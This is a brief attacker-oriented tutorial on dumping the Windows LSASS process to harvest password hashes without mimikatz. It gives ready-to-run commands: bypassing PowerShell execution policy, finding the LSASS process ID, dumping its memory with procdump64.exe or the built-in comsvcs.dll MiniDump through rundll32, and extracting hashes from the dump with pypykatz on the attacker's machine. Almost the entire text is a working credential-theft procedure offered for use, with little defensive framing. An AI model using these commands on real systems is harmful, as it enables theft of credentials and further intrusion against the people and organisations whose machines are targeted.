Lsass-dump
Don’t need mimikatz. You can now dump hashes from LSASS by abusing LSASS process and generate a lsass.dmp file. After that we will use pypykatz to extarct the hashes from lsass.dmp file.
Exploitation
First we must have an administrative privilege to carry this attack. Upload procdump64.exe to target machine.
Execute Powershell
powershell.exe -ep bypass
Get te lassa process id
get-process lsass
In our case 596 is the lsass process ID. Execute it with procdump64.exe and generate a file contain hashes.
Dumping Hashes into a file
.\procdump64.exe -accepteula -ma 596 lsass.dmp
ALTERNATE
We can also use native DLLs instead of procdump64.exe, this way we don’t have to upoad anything on target machine.
C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 596 C:\\Users\\Bob\\Desktop\\lsass.dmp full
Using Pypykatz
After downloading that lsass.dmp file to our attacking machine, now we can exctract the hashes using pypykatz.
pypykatz lsa minidump lsass.dmp